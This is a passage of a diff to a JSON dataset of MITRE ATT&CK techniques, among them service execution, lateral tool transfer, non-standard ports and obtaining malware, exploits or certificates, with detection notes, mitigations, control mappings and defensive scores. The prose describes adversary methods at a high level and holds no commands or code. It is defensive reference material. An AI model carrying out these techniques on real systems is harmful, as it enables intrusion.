+                "detection": "Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific MaaS offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.",
                 "mitigations": [
                     {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1569.002",
-                "name": "System Services: Service Execution",
-                "url": "https://attack.mitre.org/techniques/T1569/002",
-                "description": "Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://attack.mitre.org/software/S0039).\n\n[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and sc.exe can accept remote servers as arguments and may be used to conduct remote execution.\n\nAdversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.",
-                "detection": "Changes to service Registry entries and command line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool [PsExec](https://attack.mitre.org/software/S0029).",
+                "tid": "T1588.002",
+                "name": "Obtain Capabilities: Tool",
+                "url": "https://attack.mitre.org/techniques/T1588/002",
+                "description": "Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)\n\nAdversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).",
+                "detection": "In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.",
                 "mitigations": [
                     {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    },
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
+                    }
+                ]
+            },
+            {
+                "tid": "T1588.003",
+                "name": "Obtain Capabilities: Code Signing Certificates",
+                "url": "https://attack.mitre.org/techniques/T1588/003",
+                "description": "Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\n\nPrior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.",
+                "detection": "Consider analyzing code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, common name, and certificate authority. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in procuring code signing certificates.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).",
+                "mitigations": [
                     {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
+                    }
+                ]
+            },
+            {
+                "tid": "T1588.004",
+                "name": "Obtain Capabilities: Digital Certificates",
+                "url": "https://attack.mitre.org/techniques/T1588/004",
+                "description": "Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.\n\nAdversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.\n\nCertificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)\n\nAfter obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.",
+                "detection": "Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)\n\nDetection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).",
+                "mitigations": [
                     {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
+                    }
+                ]
+            },
+            {
+                "tid": "T1588.005",
+                "name": "Obtain Capabilities: Exploits",
+                "url": "https://attack.mitre.org/techniques/T1588/005",
+                "description": "Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)\n\nIn addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)\n\nAn adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",
+                "detection": "\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",
+                "mitigations": [
+                    {
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
+                    }
+                ]
+            },
+            {
+                "tid": "T1588.006",
+                "name": "Obtain Capabilities: Vulnerabilities",
+                "url": "https://attack.mitre.org/techniques/T1588/006",
+                "description": "Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)\n\nAn adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).",
+                "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of exploits for vulnerabilities (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",
+                "mitigations": [
+                    {
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             }
         ],
         "mitigations": [
             {
-                "mid": "M1040",
-                "name": "Behavior Prevention on Endpoint",
-                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                "url": "https://attack.mitre.org/mitigations/M1040"
-            },
-            {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
-            },
-            {
-                "mid": "M1022",
-                "name": "Restrict File and Directory Permissions",
-                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1022"
-            },
-            {
-                "mid": "M1018",
-                "name": "User Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1018"
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "cumulative_score": 1.0710943547619047,
-        "adjusted_score": 1.0710943547619047,
-        "has_car": true,
-        "has_sigma": false,
+        "cumulative_score": 0.05476190476190476,
+        "adjusted_score": 0.05476190476190476,
+        "has_car": false,
+        "has_sigma": true,
         "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [
-            "4.1",
-            "4.7",
-            "5.3",
-            "5.4",
-            "6.1",
-            "6.2",
-            "6.8"
-        ],
-        "nist_controls": [
-            "AC-2",
-            "AC-3",
-            "AC-5",
-            "AC-6",
-            "CA-7",
-            "CM-11",
-            "CM-2",
-            "CM-5",
-            "CM-6",
-            "CM-7",
-            "IA-2",
-            "SI-3",
-            "SI-4",
-            "SI-7"
-        ],
-        "process_coverage": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
         "network_coverage": false,
-        "file_coverage": true,
+        "file_coverage": false,
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.20476190476190478,
-            "mitigation_score": 0.38181818181818183,
+            "combined_score": 0.0047619047619047615,
             "detection_score": 0.01
         },
-        "choke_point_score": 0.2,
-        "prevalence_score": 0.66633245
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
-        "tid": "T1570",
-        "name": "Lateral Tool Transfer",
-        "description": "Adversaries may transfer tools or other files between systems in a compromised environment. Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files laterally between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.",
-        "url": "https://attack.mitre.org/techniques/T1570",
+        "tid": "T1588.001",
+        "name": "Obtain Capabilities: Malware",
+        "description": "Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.\n\nIn addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).",
+        "url": "https://attack.mitre.org/techniques/T1588/001",
         "tactics": [
-            "Lateral Movement"
+            "Resource Development"
         ],
-        "detection": "Monitor for file creation and files transferred within a network using protocols such as SMB. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.",
+        "detection": "Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific MaaS offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "PRE"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "File: File Creation",
-            "File: File Metadata",
-            "Named Pipe: Named Pipe Metadata",
-            "Network Share: Network Share Access",
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow",
-            "Process: Process Creation"
+            "Malware Repository: Malware Content",
+            "Malware Repository: Malware Metadata"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1588",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1037",
-                "name": "Filter Network Traffic",
-                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                "url": "https://attack.mitre.org/mitigations/M1037"
-            },
-            {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "cumulative_score": 0.7191745390476191,
-        "adjusted_score": 0.7191745390476191,
+        "cumulative_score": 0.09285714285714286,
+        "adjusted_score": 0.09285714285714286,
         "has_car": false,
         "has_sigma": true,
-        "has_es_siem": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1588.002",
+        "name": "Obtain Capabilities: Tool",
+        "description": "Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)\n\nAdversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).",
+        "url": "https://attack.mitre.org/techniques/T1588/002",
+        "tactics": [
+            "Resource Development"
+        ],
+        "detection": "In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Malware Repository: Malware Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1588",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [
-            "4.2",
-            "4.4",
-            "4.5",
-            "7.6",
-            "7.7",
-            "13.3",
-            "13.4",
-            "13.8",
-            "18.2",
-            "18.3"
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1588.003",
+        "name": "Obtain Capabilities: Code Signing Certificates",
+        "description": "Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\n\nPrior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.",
+        "url": "https://attack.mitre.org/techniques/T1588/003",
+        "tactics": [
+            "Resource Development"
         ],
-        "nist_controls": [
-            "AC-3",
-            "AC-4",
-            "CA-7",
-            "CM-2",
-            "CM-6",
-            "CM-7",
-            "SC-7",
-            "SI-10",
-            "SI-15",
-            "SI-3",
-            "SI-4"
+        "detection": "Consider analyzing code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, common name, and certificate authority. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in procuring code signing certificates.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).",
+        "platforms": [
+            "PRE"
         ],
-        "process_coverage": true,
-        "network_coverage": true,
-        "file_coverage": true,
+        "data_sources": [
+            "Malware Repository: Malware Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1588",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05952380952380953,
+        "adjusted_score": 0.05952380952380953,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.21904761904761905,
-            "mitigation_score": 0.38181818181818183,
-            "detection_score": 0.04
-        },
-        "choke_point_score": 0.5,
-        "prevalence_score": 0.00012692
+        "hardware_coverage": false
     },
     {
-        "tid": "T1571",
-        "name": "Non-Standard Port",
-        "description": "Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.",
-        "url": "https://attack.mitre.org/techniques/T1571",
+        "tid": "T1588.004",
+        "name": "Obtain Capabilities: Digital Certificates",
+        "description": "Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.\n\nAdversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.\n\nCertificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)\n\nAfter obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.",
+        "url": "https://attack.mitre.org/techniques/T1588/004",
         "tactics": [
-            "Command And Control"
+            "Resource Development"
         ],
-        "detection": "Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2)",
+        "detection": "Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)\n\nDetection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "PRE"
+        ],
+        "data_sources": [
+            "Certificate: Certificate Registration",
+            "Internet Scan: Response Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1588",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1588.005",
+        "name": "Obtain Capabilities: Exploits",
+        "description": "Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)\n\nIn addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)\n\nAn adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",
+        "url": "https://attack.mitre.org/techniques/T1588/005",
+        "tactics": [
+            "Resource Development"
         ],
-        "data_sources": [
-            "Network Traffic: Network Connection Creation",
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow"
+        "detection": "\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",
+        "platforms": [
+            "PRE"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1588",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
-            },
-            {
-                "mid": "M1030",
-                "name": "Network Segmentation",
-                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
